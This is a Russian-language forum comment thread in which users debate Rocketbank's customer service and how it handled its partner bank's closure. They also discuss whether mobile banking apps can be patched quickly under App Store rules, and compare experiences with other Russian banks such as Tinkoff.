                                                                                                  Но тот же Рокетбанк пока что пушистый, например срочно сообщил, когда их банк-партнёр должен был через день закрыться, что бы все успели вывести деньги.
                                                                                                  кому-то сообщили, кому-то нет. Примерно половина моей выборки долбалась с их поддержкой.
                                                                                                  • 0
                                                                                                    Сообщили массовой рассылкой по электронной почте, все известные мне знакомые получили. Согласен, электронная почта не 100% гарантирует доставку, спам-папки, всё-такое, но тем не менее. К тому же, они вообще не обязаны были предупреждать.
                                                                                                    • +2
                                                                                                      А то, что рокетбанк банком не является вас не волнует?
                                                                                                      • 0
                                                                                                        Счет открывается в Открытии, Рокетбанк как юрлицо предоставляет только мобильное приложение.
                                                                                                  • 0
                                                                                                    1) Нет такого. Есть Ханты‑Мансийский банк Открытие. Их делить не более продуктивно, чем должников ТКС от вкладчиков ТКС.
                                                                                                    2) По мне, так отсутствие ИБ — это вполне плевок на клиентов само по себе.
                                                                                                    3) Ну и он же реально глючный и нефункциональный. Я его с 4-х карт других банков пополнить так и не смог. Переводы уходят как успешные, потом молча возвращаются (и это не баг — это фича).
                                                                                                    • +3
                                                                                                      Это у вас какое-то масштабное невезение. Я и с Альфы и со Сбера пополнял — всё нормально проходило.
                                                                                                      • 0
                                                                                                        Ну, если бы только пополнение не работало — я бы списал на невезение. Но когда переводы молча откатываются — это люди даже не пытались.
                                                                                                    • +4
                                                                                                      Рокетбанк — это не банк, а сервис. Не путайте горячее с мягким.
                                                                                                      И мне интересно, что это они «могут закрыть баги в мобильном приложении в течение часа», если, например, публикация обновления в AppStore занимает минимум 2-4 дня. Если они, конечно, не используют WebView…
                                                                                                      • –1
                                                                                                        Можно патчить приложение на лету.
                                                                                                        • +1

                                                                                                          В AppStore — нельзя. Опять же, если они не используют WebView.

                                                                                                          • –2
                                                                                                            AppStore тут ни при чем, разработчик может подгружать код с сервера.
                                                                                                            • +3

                                                                                                              Не может, это прямо запрещено в соглашении AppStore, в любых проявлениях, кроме отображения контента в стандартном WebView.

                                                                                                              • +1
                                                                                                                Много логики реализовано на самом клиенте ИБ?
                                                                                                                Думаю минимум в 80% случаев баги на сервер-сайд, и никаких перевыкатов «в AppStore» делать не нужно
                                                                                                                • 0
                                                                                                                  В приложениях обычно инфо подгружается с серверов
                                                                                                            • 0
                                                                                                              Как бы, давно эту лавочку прикрыли. Наверно, как раз после той истории с приложением, которое пропустили как «фоточки котиков» (условно), а потом автор удаленно заменил чуть кода.

                                                                                                              Вот он сурсы грузить — пожалуйста, многие это используют.
                                                                                                            • 0
                                                                                                              Тсс, я сейчас вам открою тайну… не все пользуются iOS, где драконовские правила и тормозная модерация. Под Android обновления приложений прилетают быстро.
                                                                                                              • 0
                                                                                                                Тсс, спасибо, но это для меня не тайна :-))
                                                                                                                • +1
                                                                                                                  Я вам тайну открою, что если я пользуюсь iOS мне не важно как быстро проходит модерация под Android.
                                                                                                                  • +1
                                                                                                                    Так речь то шла про высказывание о том, что кому-то прилетел багфикс приложения за час. Из высказывания не очевидно, что у этого кого-то был айфон, а заявлений о скорости фиксов багов вы не делали. Так что вполне возможен вариант, что у этого пользователя был Android и он говорит правду.
                                                                                                                  • 0
                                                                                                                    под iOS есть такая вещь как https://rollout.io/ — специально предназначена для решения проблемы тормозной модерации.
                                                                                                                • 0
                                                                                                                  У меня с Рокебанком только позитивный опыт.

                                                                                                                  Они были единственным банком который согласился сделать карту за 5 дней, и привезти её в определённое часовое окно (с 16:00-17:30), так как мне срочна была нужна российская карта, а я как раз узнал, что лечу в командировку в Москву (живу за пределами РФ).

                                                                                                                  После всей этой беды с банком партнёром, на следующий день поддержка сама написала мне и спросила адрес. На мои «да вы всё равно не отправите новую карту, я не в России», мне сказали «не переживайте, отправим». Через неделю у меня была новая карта, и на неё вернулись заблокированные деньги со старого счёта.

                                                                                                                  Так же два раза была ситуация когда местный банкомат банка ING не отдавал деньги с карты Рокетбанка, но блокировал их на счету. Первый раз после письма претензии на разблокирование ушло 30 дней, второй раз дней пять.
                                                                                                                  • 0
                                                                                                                    Тот же Тинькофф привозит карты чуть ли не завтра. Есть банки, что карты на месте эмбоссируют
                                                                                                                  • +2
                                                                                                                    Да-да. Предупредили.
                                                                                                                    На самом деле они запустили рассылку, одумались, «нажали ctrl-c» до окончания, а потом всем, кто получил первое письмо, прислали второе «всё хорошо, сидите спокойно».

                                                                                                                    А когда пришло письмо вида «чуваки, наш банк тю-тю уже точно» — то никаких денег снять-перевести уже нельзя было.

                                                                                                                    Как результат — я уже полгода не могу у них завести новую карту, чтобы забрать деньги со старой их «удобным способом» без стояния в очереди и заполнения бумажек.
                                                                                                                    • 0
                                                                                                                      А почему не можете? Плюс, на сайте АСВ написано, что старый способ (с бумажками через банки-агенты) работает
                                                                                                                      • 0
                                                                                                                        Ну процесс выглядит примерно так:
                                                                                                                        — народ, у меня приложение ваше не логинится.
                                                                                                                        — пришлите страницы паспорта такие-то и такие сканом
                                                                                                                        — держите.
                                                                                                                        — вот ещё такая нужна
                                                                                                                        — держите
                                                                                                                        <проходит месяц>
                                                                                                                        — у меня приложение всё ещё не работает
                                                                                                                        — пришлите страницы паспорта такие-то (те же).

                                                                                                                        Сейчас вот по пятому кругу отправлять буду, если найду в себе силы без мата написать.
                                                                                                                        • 0
                                                                                                                          Может уж лучше в ближайший Сбербанк сходить и оставить заявление?)
                                                                                                              • +1
                                                                                                                Пользовался тремя банками и ни один мне в лицо не плевал. Даже о Тинькоффе слышал только положительные отзывы от родственников.
                                                                                                                • 0
                                                                                                                  Могу предположить, что для полноты опыта надо чаще пользоваться. Не у всех каждый день с плевками…
                                                                                                                  • 0
                                                                                                                    Регулярно пользуюсь. Родня Тинькоффа вообще боготворит и хвастает банком.)
                                                                                                                    • 0
                                                                                                                      Ну, к тинькоффу лично у меня тоже претензий не много. Но у него тоже бывают те ещё закидоны, вроде отключения дистанционного обслуживания некоторым людям.
                                                                                                                      • 0
                                                                                                                        Ну, я сам не пользуюсь. Только слышал.)
                                                                                                                        • 0
                                                                                                                          Ага, помню. А когда им в суде выдают постановление возобновить обслуживание, они отказываются его выполнять.
                                                                                                                • +17
                                                                                                                  Зря вы так, на самом деле банк очень хороший, остальные порой еще хуже.
                                                                                                                  Раньше им вообще альтернатив не было по клиентоориентированности, поэтому лояльных клиентов у них очень много, я в том числе, уже пятый год подряд.
                                                                                                                  • +6
                                                                                                                    Банк, в первую очередь финансовая организация, а уже потом клиентоориентированный технологичный стартап. Она сначала про деньги, а только потом про общительную техподдержку и аякс запросы.
                                                                                                                    И когда эта финансовая организация платит проценты по вкладу только спустя год и только по суду, то это, на мой взгляд, должно ставить крест на всём остальном.